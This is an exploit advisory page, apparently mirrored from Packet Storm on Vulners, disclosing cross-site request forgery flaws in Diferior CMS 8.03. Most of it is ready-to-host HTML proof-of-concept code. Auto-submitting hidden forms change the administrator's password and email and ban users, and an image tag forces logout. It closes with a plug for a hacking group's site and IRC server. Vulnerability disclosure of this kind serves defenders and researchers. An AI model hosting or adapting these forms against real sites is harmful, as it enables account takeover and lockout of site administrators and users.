Lucene search
K

Diferior CMS 8.03 Cross Site Request Forgery

🗓️ 14 Jul 2010 00:00:00Reported by 10n1z3dType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Diferior CMS 8.03 CSRF vulnerabilities for admin password, email change, user ban, and logou

Code
`<!---  
Title: Diferior CMS 8.03 Multiple CSRF Vulnerabilities  
Author: 10n1z3d <10n1z3d[at]w[dot]cn>  
Date: Tue 13 Jul 2010 11:50:32 AM EEST  
Vendor: http://diferior.com/  
Download: http://diferior.com/post_files/news/diferior-8-03-released/Diferior_v8.03.tar.gz  
--->  
  
-=[ CSRF PoC 1 - Change Admin Password ]=-  
  
<html>  
<head>  
<title>Diferior CMS 8.03 Multiple CSRF Vulnerabilities - Change Admin Password</title>  
</head>  
<body onload="document.csrf.submit();">  
<form name="csrf" action="http://[domain]/user/profile/pass.html" method="post">  
<!--- You can change cust_user to change the password of other user --->  
<input type="hidden" name="cust_user" value="admin" />  
<input type="hidden" name="pass1" value="rootroot" />  
<input type="hidden" name="pass2" value="rootroot" />  
</form>  
</body>  
</html>  
  
-=[ CSRF PoC 2 - Change Admin Email ]=-  
  
<html>  
<head>  
<title>Diferior CMS 8.03 Multiple CSRF Vulnerabilities - Change Admin Email</title>  
</head>  
<body onload="document.csrf.submit();">  
<form name="csrf" action="http://[domain]/user/profile/email.html" method="post">  
<!--- You can change cust_user to change the email of other user --->  
<input type="hidden" name="cust_user" value="admin" />  
<input type="hidden" name="email1" value="[email protected]" />  
<input type="hidden" name="email2" value="[email protected]" />  
</form>  
</body>  
</html>  
  
-=[ CSRF PoC 3 - Ban User ]=-  
  
<html>  
<head>  
<title>Diferior CMS 8.03 Multiple CSRF Vulnerabilities - Ban User</title>  
</head>  
<body onload="document.csrf.submit();">  
<form name="csrf" action="http://[domain]/user/ban/[username]/2.html" method="post">  
<input type="hidden" name="warned" value="on" />  
<input type="hidden" name="noleech" value="on" />  
<input type="hidden" name="banned" value="on" />  
</form>  
</body>  
</html>  
  
-=[ CSRF PoC 4 - Logout The User/Administrator ]=-  
  
<img src="http://[domain]/user/logoff.html" alt="Do you see this?" />  
  
<!---  
http://www.evilzone.org/  
irc.evilzone.org (6697 / 9999)  
--->  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Jul 2010 00:00Current
0.8Low risk
Vulners AI Score0.8
25